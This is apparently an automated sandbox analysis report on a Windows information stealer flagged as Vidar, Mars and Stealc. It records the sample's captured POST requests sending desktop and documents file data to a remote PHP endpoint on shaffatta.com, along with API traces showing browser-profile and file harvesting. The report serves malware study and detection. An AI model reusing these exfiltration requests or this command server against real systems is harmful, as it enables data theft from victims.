2024-05-03 00:09:03 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4f 56 6c 64 61 51 56 42 52 55 Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOVldaQVBRU
2024-05-03 00:09:03 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49767	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:09:03 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:09:03 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 51 51 55 78 53 52 31 56 44 56 Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xQQUxSR1VDV
2024-05-03 00:09:04 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49768	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:09:04 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBF Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:09:04 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 39 6a 61 31 78 46 52 55 64 58 57 46 56 49 56 Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="file_name"ZmlsZXNcZG9ja1xFRUdXWFVIV
2024-05-03 00:09:05 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Target ID:	0
Start time:	02:06:59
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\c4RAHq3BNl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\c4RAHq3BNl.exe"
Imagebase:	0x400000
File size:	356'352 bytes
MD5 hash:	5451FDDD7B59B191DF90B89A06EF1691
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3252549703.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3253194154.0000000002D37000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3253231068.0000000002D60000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	02:07:04
Start date:	03/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:07:04
Start date:	03/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:08:29
Start date:	03/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,02D5ECB0), ref: 0041625D
GetProcAddress.KERNEL32(75900000,02D5EB70), ref: 00416275
GetProcAddress.KERNEL32(75900000,02D759E0), ref: 0041628E
GetProcAddress.KERNEL32(75900000,02D75B60), ref: 004162A6
GetProcAddress.KERNEL32(75900000,02D75BA8), ref: 004162BE
GetProcAddress.KERNEL32(75900000,02D75B18), ref: 004162D7
GetProcAddress.KERNEL32(75900000,02D5E740), ref: 004162EF
GetProcAddress.KERNEL32(75900000,02D75B48), ref: 00416307
GetProcAddress.KERNEL32(75900000,02D75B78), ref: 00416320
GetProcAddress.KERNEL32(75900000,02D75B90), ref: 00416338
GetProcAddress.KERNEL32(75900000,02D75B00), ref: 00416350
GetProcAddress.KERNEL32(75900000,02D5EAD0), ref: 00416369
GetProcAddress.KERNEL32(75900000,02D5EB10), ref: 00416381
GetProcAddress.KERNEL32(75900000,02D5EAF0), ref: 00416399
GetProcAddress.KERNEL32(75900000,02D5EBF0), ref: 004163B2
GetProcAddress.KERNEL32(75900000,02D75BC0), ref: 004163CA
GetProcAddress.KERNEL32(75900000,02D75B30), ref: 004163E2
GetProcAddress.KERNEL32(75900000,02D5E790), ref: 004163FB
GetProcAddress.KERNEL32(75900000,02D5E9F0), ref: 00416413
GetProcAddress.KERNEL32(75900000,02D77B08), ref: 0041642B
GetProcAddress.KERNEL32(75900000,02D77AA8), ref: 00416444
GetProcAddress.KERNEL32(75900000,02D779B8), ref: 0041645C
GetProcAddress.KERNEL32(75900000,02D77898), ref: 00416474
GetProcAddress.KERNEL32(75900000,02D5EC90), ref: 0041648D
GetProcAddress.KERNEL32(75900000,02D77A78), ref: 004164A5
GetProcAddress.KERNEL32(75900000,02D77940), ref: 004164BD
GetProcAddress.KERNEL32(75900000,02D779E8), ref: 004164D6
GetProcAddress.KERNEL32(75900000,02D77AC0), ref: 004164EE
GetProcAddress.KERNEL32(75900000,02D77970), ref: 00416506
GetProcAddress.KERNEL32(75900000,02D77A60), ref: 0041651F
GetProcAddress.KERNEL32(75900000,02D77850), ref: 00416537
GetProcAddress.KERNEL32(75900000,02D77AD8), ref: 0041654F
GetProcAddress.KERNEL32(75900000,02D778C8), ref: 00416568
GetProcAddress.KERNEL32(75900000,02D31C20), ref: 00416580
GetProcAddress.KERNEL32(75900000,02D77AF0), ref: 00416598
GetProcAddress.KERNEL32(75900000,02D77B20), ref: 004165B1
GetProcAddress.KERNEL32(75900000,02D5EB30), ref: 004165C9
GetProcAddress.KERNEL32(75900000,02D779A0), ref: 004165E1
GetProcAddress.KERNEL32(75900000,02D5EC30), ref: 004165FA
GetProcAddress.KERNEL32(75900000,02D77928), ref: 00416612
GetProcAddress.KERNEL32(75900000,02D77A18), ref: 0041662A
GetProcAddress.KERNEL32(75900000,02D5EC50), ref: 00416643
GetProcAddress.KERNEL32(75900000,02D5EC70), ref: 0041665B
LoadLibraryA.KERNEL32(02D779D0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(02D77958,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(02D77B38,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(02D77A90,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(02D77A00,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(02D77880,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(02D77910,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(02D778E0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75FD0000,02D5F090), ref: 0041670A
GetProcAddress.KERNEL32(75FD0000,02D77868), ref: 00416722
GetProcAddress.KERNEL32(75FD0000,02D753F8), ref: 0041673A
GetProcAddress.KERNEL32(75FD0000,02D778B0), ref: 00416753
GetProcAddress.KERNEL32(75FD0000,02D5EE30), ref: 0041676B
GetProcAddress.KERNEL32(734B0000,02D5E7B8), ref: 00416790
GetProcAddress.KERNEL32(734B0000,02D5EE10), ref: 004167A9
GetProcAddress.KERNEL32(734B0000,02D5E2E0), ref: 004167C1
GetProcAddress.KERNEL32(734B0000,02D778F8), ref: 004167D9
GetProcAddress.KERNEL32(734B0000,02D77988), ref: 004167F2
GetProcAddress.KERNEL32(734B0000,02D5EEF0), ref: 0041680A
GetProcAddress.KERNEL32(734B0000,02D5EE50), ref: 00416822
GetProcAddress.KERNEL32(734B0000,02D77A48), ref: 0041683B
GetProcAddress.KERNEL32(763B0000,02D5F0D0), ref: 0041685C
GetProcAddress.KERNEL32(763B0000,02D5ED30), ref: 00416874
GetProcAddress.KERNEL32(763B0000,02D77A30), ref: 0041688D
GetProcAddress.KERNEL32(763B0000,02D77BC8), ref: 004168A5
GetProcAddress.KERNEL32(763B0000,02D5EE70), ref: 004168BD
GetProcAddress.KERNEL32(750F0000,02D5E4E8), ref: 004168E3
GetProcAddress.KERNEL32(750F0000,02D5E330), ref: 004168FB
GetProcAddress.KERNEL32(750F0000,02D77BF8), ref: 00416913
GetProcAddress.KERNEL32(750F0000,02D5EE90), ref: 0041692C
GetProcAddress.KERNEL32(750F0000,02D5F070), ref: 00416944
GetProcAddress.KERNEL32(750F0000,02D5E380), ref: 0041695C
GetProcAddress.KERNEL32(75A50000,02D77B98), ref: 00416982
GetProcAddress.KERNEL32(75A50000,02D5EFD0), ref: 0041699A
GetProcAddress.KERNEL32(75A50000,02D75458), ref: 004169B2
GetProcAddress.KERNEL32(75A50000,02D77B68), ref: 004169CB
GetProcAddress.KERNEL32(75A50000,02D77B80), ref: 004169E3
GetProcAddress.KERNEL32(75A50000,02D5EDD0), ref: 004169FB
GetProcAddress.KERNEL32(75A50000,02D5EEB0), ref: 00416A14
GetProcAddress.KERNEL32(75A50000,02D77BB0), ref: 00416A2C
GetProcAddress.KERNEL32(75A50000,02D77BE0), ref: 00416A44
GetProcAddress.KERNEL32(75070000,02D5EFF0), ref: 00416A66
GetProcAddress.KERNEL32(75070000,02D77B50), ref: 00416A7E
GetProcAddress.KERNEL32(75070000,02D77C10), ref: 00416A96
GetProcAddress.KERNEL32(75070000,02D78210), ref: 00416AAF
GetProcAddress.KERNEL32(75070000,02D77FA0), ref: 00416AC7
GetProcAddress.KERNEL32(74E50000,02D5EDB0), ref: 00416AE8
GetProcAddress.KERNEL32(74E50000,02D5EDF0), ref: 00416B01
GetProcAddress.KERNEL32(75320000,02D5F010), ref: 00416B22
GetProcAddress.KERNEL32(75320000,02D78198), ref: 00416B3A
GetProcAddress.KERNEL32(6F2A0000,02D5EED0), ref: 00416B60
GetProcAddress.KERNEL32(6F2A0000,02D5EF10), ref: 00416B78
GetProcAddress.KERNEL32(6F2A0000,02D5EF30), ref: 00416B90
GetProcAddress.KERNEL32(6F2A0000,02D77F58), ref: 00416BA9
GetProcAddress.KERNEL32(6F2A0000,02D5F030), ref: 00416BC1
GetProcAddress.KERNEL32(6F2A0000,02D5EF70), ref: 00416BD9
GetProcAddress.KERNEL32(6F2A0000,02D5EFB0), ref: 00416BF2
GetProcAddress.KERNEL32(6F2A0000,02D5EF50), ref: 00416C0A
GetProcAddress.KERNEL32(74E00000,02D77F70), ref: 00416C2B
GetProcAddress.KERNEL32(74E00000,02D75518), ref: 00416C44
GetProcAddress.KERNEL32(74E00000,02D77FE8), ref: 00416C5C
GetProcAddress.KERNEL32(74E00000,02D780F0), ref: 00416C74
GetProcAddress.KERNEL32(74DF0000,02D5F0B0), ref: 00416C96
GetProcAddress.KERNEL32(6D9B0000,02D78168), ref: 00416CB7
GetProcAddress.KERNEL32(6D9B0000,02D5F050), ref: 00416CCF
GetProcAddress.KERNEL32(6D9B0000,02D77F88), ref: 00416CE8
GetProcAddress.KERNEL32(6D9B0000,02D77FB8), ref: 00416D00

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s%s, xrefs: 00411838
%s\%s, xrefs: 00411714
%s\%s\%s, xrefs: 004117DB
%s\*, xrefs: 0041165D
%s\%s, xrefs: 004117FD

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 1c5a19b8d0364035e361803f1f2d8b881592936573ce4df1f42e7415625cdfa2
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: 1c5a19b8d0364035e361803f1f2d8b881592936573ce4df1f42e7415625cdfa2
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNEL32(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

\Brave\Preferences, xrefs: 0040B97B
Brave, xrefs: 0040B8A2
Preferences, xrefs: 0040B8BE
Google Chrome, xrefs: 0040BDB9

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 2bea4be879b4c07dc692db0783b781ac6eeba21f1432059b5c9109fef96b76dc
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 2bea4be879b4c07dc692db0783b781ac6eeba21f1432059b5c9109fef96b76dc
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: fcecdc0113d85318793fd84deb2f89eac7e502c6f555e42ff774b71d9ce7f9e0
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: fcecdc0113d85318793fd84deb2f89eac7e502c6f555e42ff774b71d9ce7f9e0
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

